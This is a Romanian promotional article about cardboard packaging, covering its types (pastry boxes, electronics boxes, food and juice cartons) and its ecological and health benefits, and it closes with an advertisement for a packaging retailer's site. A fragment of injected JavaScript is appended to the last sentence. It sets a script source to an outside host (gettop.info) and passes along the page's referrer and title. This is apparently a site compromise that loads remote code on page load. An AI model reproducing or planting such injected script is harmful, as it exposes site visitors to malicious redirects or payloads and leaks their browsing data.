ambalaje din carton

ambalaje din carton

Cartonul este materialul obtinut prin acelasi proces ca si hartia doar ca poate fi in mai multe straturi de dimensiuni mai mari.

Traim intr-o lume in care cu totii ne dorim sa tinem cure si diete sanatoase in care sa domine fructele si legumele, insa intotdeauna poftele de nesanatos ne inving perseverenta de a duce un stil de viata sanatos. Cu toate acestea exista persoane care chiar lupta pentru o viata sanatoasa si care cauta sa cumpere produse naturale si care folosesc numai lucruri reciclabile precum cartonul.

Nu toata lumea stie ca pe langa aluminiu, care este cel mai des folosit amblaj de impachetat, si cartonul este o solutie naturala care nu afecteaza in nici un fel continutul. Ambalajele din carton sunt foarte practice si nu emana nici o substanta toxica ce poate altera mancarea si astfel nu ne putem imbolnavi.

Tipuri de ambalaje din carton

In primul rand atunci cand mergeti la o cofetarie si doriti sa cumparati prajituri sau un tort la pachet, cu siguranta doamna de acolo va va impacheta totul intr-un ambalaj din carton. Acest tip de carton este unul mai subtire, dar protejeaza bine continutul si asa puteti fi sigur ca veti ajunge cu desertul intreg acasa.

Al doilea tip de ambalaj din carton este reprezentat de cutiile in care sunt puse obiectele fragile din portelan, electrocasnicele si electronicele. Bineinteles ca peretii ambalajului din carton sunt captusiti cu placute de polistiren pentru un nivel de siguranta crescut.

Alte tipuri de ambalaje din carton sunt cele in care se impacheteaza alimentele. Ati vazut ca atunci cand mergeti la supermarket sunt anumite produse alimentare ambalate in carton si invelite in plastic sau daca v-ati uitata atent sau poate chiar ati cumparat, exista sucuri depozitate in ambalaje de carton.

De ce sa utilizati ambalajele din carton

Exista motive intemeiate pentru care multa lume sustine si chiar si utilizeaza ambalajele din carton. Acestea sunt ecologice si biodegradabile, si astfel aducem un beneficiu mediului in care traim, sunt usoare din punct de vedere al greutatii, sunt foarte practice si sanatoase deoarece nu emana nimic daunator corpului uman.

Daca v-ati convins de utilitatea si beneficiile pe care ni le aduce folosirea ambalajelor din carton incercati sa indrumati si alte persoane din jurul dumneavoastra sa foloseasca pentru ca este spre binele sanatatii noastra si a planetei pe care traim.

Pentru mai multe informatii accesati site-ul www.Prodamco.ro si gasiti o multime de produse si ambalaje din carton la preturi foarte mici. Acest site va pune la dispozitie chiar si un consilier care va poate ajuta sa va decideti ce produs indeplineste toate nevoile dumneavoastra si va poate da sfaturi si indrumari pe care daca le urmati veti beneficia de ceea ce va doriti. Produsele de aici sunt de calitate foarte buna, iar gama de clienti care au achizitionat ambalaje din carton sau alte produse din carton s-au aratat foare multumiti si recunoscatori. In plus de asta veti primi si anumite atentionari despre folosirea incorecta sau factorii ce pot afecta calitatea produselor.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;